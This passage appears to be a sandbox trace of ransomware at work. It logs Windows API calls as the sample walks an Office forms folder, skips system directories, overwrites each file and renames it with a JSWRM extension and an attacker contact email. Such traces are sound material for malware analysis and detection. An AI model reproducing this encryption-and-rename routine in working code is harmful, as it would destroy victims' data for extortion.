ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30d, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REPORT.CFG", cAlternateFileName="")) returned 1 [0130.078] lstrcmpiW (lpString1="REPORT.CFG", lpString2=".") returned 1 [0130.078] lstrcmpiW (lpString1="REPORT.CFG", lpString2="..") returned 1 [0130.078] lstrcmpiW (lpString1="REPORT.CFG", lpString2="...") returned 1 [0130.078] lstrcmpiW (lpString1="REPORT.CFG", lpString2="windows") returned -1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="recovery") returned 1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="perflogs") returned 1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="documents and settings") returned 1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="system volume information") returned -1 [0130.079] lstrcmpiW (lpString1="REPORT.CFG", lpString2="msocache") returned 1 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORT.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORT.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORT.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORT.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORT.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\report.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.080] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=781) returned 1 [0130.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.080] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0130.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.082] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0130.082] CloseHandle (hObject=0x314) returned 1 [0130.082] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\report.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\report.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.083] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REPORTL.ICO", cAlternateFileName="")) returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2=".") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="..") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="...") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="windows") returned -1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="recovery") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="perflogs") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="documents and settings") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="system volume information") returned -1 [0130.083] lstrcmpiW (lpString1="REPORTL.ICO", lpString2="msocache") returned 1 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORTL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORTL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reportl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.085] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.085] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.087] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.087] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.087] CloseHandle (hObject=0x314) returned 1 [0130.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reportl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reportl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.088] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REPORTS.ICO", cAlternateFileName="")) returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2=".") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="..") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="...") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="windows") returned -1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="recovery") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="perflogs") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="documents and settings") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="system volume information") returned -1 [0130.088] lstrcmpiW (lpString1="REPORTS.ICO", lpString2="msocache") returned 1 [0130.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORTS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPORTS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPORTS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reports.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.090] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.090] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.090] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.091] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.091] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.092] CloseHandle (hObject=0x314) returned 1 [0130.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reports.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPORTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\reports.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.093] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30b, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RESEND.CFG", cAlternateFileName="")) returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2=".") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="..") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="...") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="windows") returned -1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="recovery") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="perflogs") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="documents and settings") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="system volume information") returned -1 [0130.093] lstrcmpiW (lpString1="RESEND.CFG", lpString2="msocache") returned 1 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESEND.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESEND.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESEND.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESEND.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESEND.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESEND.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resend.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=779) returned 1 [0130.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.094] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0130.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.096] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0130.096] CloseHandle (hObject=0x314) returned 1 [0130.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESEND.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resend.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESEND.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resend.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.097] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RESENDL.ICO", cAlternateFileName="")) returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2=".") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="..") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="...") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="windows") returned -1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="recovery") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="perflogs") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="documents and settings") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="system volume information") returned -1 [0130.097] lstrcmpiW (lpString1="RESENDL.ICO", lpString2="msocache") returned 1 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESENDL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESENDL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resendl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.098] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.098] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.098] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.100] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.100] CloseHandle (hObject=0x314) returned 1 [0130.103] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resendl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RESENDL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\resendl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.104] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RESENDS.ICO", cAlternateFileName="")) returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2=".") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="..") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="...") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="windows") returned -1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="recovery") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="perflogs") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="documents and settings") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="system volume information") returned -1 [0130.104] lstrcmpiW (lpString1="RESENDS.ICO", lpString2="msocache") returned 1 [0130.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RESENDS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RESENDS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 